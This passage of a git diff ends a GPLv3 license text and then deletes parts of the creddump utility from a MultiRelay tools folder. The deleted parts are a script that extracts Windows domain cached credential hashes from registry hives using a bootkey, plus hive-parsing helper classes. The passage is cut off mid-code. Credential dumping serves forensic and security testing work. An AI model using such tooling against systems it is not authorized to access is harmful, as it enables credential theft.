- Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. diff --git a/tools/MultiRelay/creddump/README b/tools/MultiRelay/creddump/README deleted file mode 100644 index e69de29..0000000 diff --git a/tools/MultiRelay/creddump/cachedump.py b/tools/MultiRelay/creddump/cachedump.py deleted file mode 100644 index 591214a..0000000 --- a/tools/MultiRelay/creddump/cachedump.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -# This file is part of creddump. -# -# creddump is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# creddump is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with creddump. If not, see . - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - - -import sys -from framework.win32.domcachedump import dump_file_hashes - -if len(sys.argv) < 3: - print "usage: %s bootkey " % sys.argv[0] - sys.exit(1) - -dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) - diff --git a/tools/MultiRelay/creddump/framework/__init__.py b/tools/MultiRelay/creddump/framework/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/tools/MultiRelay/creddump/framework/addrspace.py b/tools/MultiRelay/creddump/framework/addrspace.py deleted file mode 100755 index fad81a1..0000000 --- a/tools/MultiRelay/creddump/framework/addrspace.py +++ /dev/null @@ -1,141 +0,0 @@ -# Volatility -# Copyright (C) 2007 Volatile Systems -# -# Original Source: -# Copyright (C) 2004,2005,2006 4tphi Research -# Author: {npetroni,awalters}@4tphi.net (Nick Petroni and AAron Walters) -# -# This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation; either version 2 of the License, or (at -# your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -# - -""" -@author: AAron Walters -@license: GNU General Public License 2.0 or later -@contact: awalters@volatilesystems.com -@organization: Volatile Systems -""" - -""" Alias for all address spaces """ - -import os -import struct - -class FileAddressSpace: - def __init__(self, fname, mode='rb', fast=False): - self.fname = fname - self.name = fname - self.fhandle = open(fname, mode) - self.fsize = os.path.getsize(fname) - - if fast == True: - self.fast_fhandle = open(fname, mode) - - def fread(self,len): - return self.fast_fhandle.read(len) - - def read(self, addr, len): - self.fhandle.seek(addr) - return self.fhandle.read(len) - - def read_long(self, addr): - string = self.read(addr, 4) - (longval, ) = struct.unpack('L', string) - return longval - - def get_address_range(self): - return [0,self.fsize-1] - - def get_available_addresses(self): - return [self.get_address_range()] - - def is_valid_address(self, addr): - return addr < self.fsize - 1 - - def close(): - self.fhandle.close() - -# Code below written by Brendan Dolan-Gavitt - -BLOCK_SIZE = 0x1000 - -class HiveFileAddressSpace: - def __init__(self, fname): - self.fname = fname - self.base = FileAddressSpace(fname) - - def vtop(self, vaddr): - return vaddr + BLOCK_SIZE + 4 - - def read(self, vaddr, length, zero=False): - first_block = BLOCK_SIZE - vaddr % BLOCK_SIZE - full_blocks = ((length + (vaddr % BLOCK_SIZE)) / BLOCK_SIZE) - 1 - left_over = (length + vaddr) % BLOCK_SIZE - - paddr = self.vtop(vaddr) - if paddr == None and zero: - if length < first_block: - return "\0" * length - else: - stuff_read = "\0" * first_block - elif paddr == None: - return None - else: - if length < first_block: - stuff_read = self.base.read(paddr, length) - if not stuff_read and zero: - return "\0" * length - else: - return stuff_read - - stuff_read = self.base.read(paddr, first_block) - if not stuff_read and zero: - stuff_read = "\0" * first_block - - new_vaddr = vaddr + first_block - for i in range(0,full_blocks): - paddr = self.vtop(new_vaddr) - if paddr == None and zero: - stuff_read = stuff_read + "\0" * BLOCK_SIZE - elif paddr == None: - return None - else: - new_stuff = self.base.read(paddr, BLOCK_SIZE) - if not new_stuff and zero: - new_stuff = "\0" * BLOCK_SIZE - elif not new_stuff: - return None - else: - stuff_read = stuff_read + new_stuff - new_vaddr = new_vaddr + BLOCK_SIZE - - if left_over > 0: - paddr = self.vtop(new_vaddr) - if paddr == None and zero: - stuff_read = stuff_read + "\0" * left_over - elif paddr == None: - return None - else: - stuff_read = stuff_read + self.base.read(paddr, left_over) - return stuff_read - - def read_long_phys(self, addr): - string = self.base.read(addr, 4) - (longval, ) = struct.unpack('L', string) - return longval - - def is_valid_address(self, vaddr): - paddr = self.vtop(vaddr) - if not paddr: return False - return self.base.is_valid_address(paddr) diff --git a/tools/MultiRelay/creddump/framework/newobj.py b/tools/MultiRelay/creddump/framework/newobj.py deleted file mode 100644 index 51ae55f..0000000 --- a/tools/MultiRelay/creddump/framework/newobj.py +++ /dev/null @@ -1,301 +0,0 @@ -# This file is part of creddump. -# -# creddump is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# creddump is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with creddump. If not, see . - -""" -@author: Brendan Dolan-Gavitt -@license: GNU General Public License 2.0 or later -@contact: bdolangavitt@wesleyan.edu -""" - -from framework.object import * -from framework.types import regtypes as types -from operator import itemgetter -from struct import unpack - -def get_ptr_type(structure, member): - """Return the type a pointer points to. - - Arguments: - structure : the name of the structure from vtypes - member : a list of members - - Example: - get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY'] - """ - if len(member) > 1: - _, tp = get_obj_offset(types, [structure, member[0]]) - if tp == 'array': - return types[structure][1][member[0]][1][2][1] - else: - return get_ptr_type(tp, member[1:]) - else: - return types[structure][1][member[0]][1][1] - -class Obj(object): - """Base class for all objects. - - May return a subclass for certain data types to allow - for special handling. - """ - - def __new__(typ, name, address, space): - if name in globals(): - # This is a bit of "magic" - # Could be replaced with a dict mapping type names to types - return globals()[name](name,address,space) - elif name in builtin_types: - return Primitive(name, address, space) - else: - obj = object.__new__(typ) - return obj - - def __init__(self, name, address, space): - self.name = name - self.address = address - self.space = space - - # Subclasses can add fields to this list if they want them - # to show up in values() or members(), even if they do not - # appear in the vtype definition - self.extra_members = [] - - def __getattribute__(self, attr): - try: - return object.__getattribute__(self, attr) - except AttributeError: - pass - - if self.name in builtin_types: - raise AttributeError("Primitive types have no dynamic attributes") - - try: - off, tp = get_obj_offset(types, [self.name, attr]) - except: - raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr)) - - if tp == 'array': - a_len = types[self.name][1][attr][1][1] - l = [] - for i in range(a_len): - a_off, a_tp = get_obj_offset(types, [self.name, attr, i]) - if a_tp == 'pointer': - ptp = get_ptr_type(self.name, [attr, i]) - l.append(Pointer(a_tp, self.address+a_off, self.space, ptp)) - else: - l.append(Obj(a_tp, self.address+a_off, self.space)) - return l - elif tp == 'pointer': - # Can't just return a Obj here, since pointers need to also - # know what type they point to. - ptp = get_ptr_type(self.name, [attr]) - return Pointer(tp, self.address+off, self.space, ptp) - else: - return Obj(tp, self.address+off, self.space) - - def __div__(self, other): - if isinstance(other,tuple) or isinstance(other,list): - return Pointer(other[0], self.address, self.space, other[1]) - elif isinstance(other,str): - return Obj(other, self.address, self.space) - else: - raise ValueError("Must provide a type name as string for casting") - - def members(self): - """Return a list of this object's members, sorted by offset.""" - - # Could also just return the list - membs = [ (k, v[0]) for k,v in types[self.name][1].items()] - membs.sort(key=itemgetter(1)) - return map(itemgetter(0),membs) + self.extra_members - - def values(self): - """Return a dictionary of this object's members and their values""" - - valdict = {} - for k in self.members(): - valdict[k] = getattr(self, k) - return valdict - - def bytes(self, length=-1): - """Get bytes starting at the address of this object. - - Arguments: - length : the number of bytes to read. Default: size of - this object. - """ - - if length == -1: - length = self.size() - return self.space.read(self.address, length) - - def size(self): - """Get the size of this object.""" - - if self.name in builtin_types: - return builtin_types[self.name][0] - else: - return types[self.name][0] - - def __repr__(self): - return "<%s @%08x>" % (self.name, self.address) - - def __eq__(self, other): - if not isinstance(other, Obj): - raise TypeError("Types are incomparable") - return self.address == other.address and self.name == other.name - - def __ne__(self, other): - return not self.__eq__(other) - - def __hash__(self): - return hash(self.address) ^ hash(self.name) - - def is_valid(self): - return self.space.is_valid_address(self.address) - - def get_offset(self, member): - return get_obj_offset(types, [self.name] + member) - -class Primitive(Obj): - """Class to represent a primitive data type. - - Attributes: - value : the python primitive value of this type - """ - - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def __init__(self, name, address, space): - super(Primitive,self).__init__(name, address, space) - length, fmt = builtin_types[name] - data = space.read(address,length) - if not data: self.value = None - else: self.value = unpack(fmt,data)[0] - - def __repr__(self): - return repr(self.value) - - def members(self): - return [] - -class Pointer(Obj): - """Class to represent pointers. - - value : the object pointed to - - If an attribute is not found in this instance, - the attribute will be looked up in the referenced - object.""" - - def __new__(typ, *args, **kwargs): - obj = object.__new__(typ) - return obj - - def __init__(self, name, address, space, ptr_type): - super(Pointer,self).__init__(name, address, space) - ptr_address = read_value(space, name, address) - if ptr_type[0] == 'pointer': - self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1]) - else: - self.value = Obj(ptr_type[0], ptr_address, self.space) - - def __getattribute__(self, attr): - # It's still nice to be able to access things through pointers - # without having to explicitly dereference them, so if we don't - # find an attribute via our superclass, just dereference the pointer - # and return the attribute in the pointed-to type. - 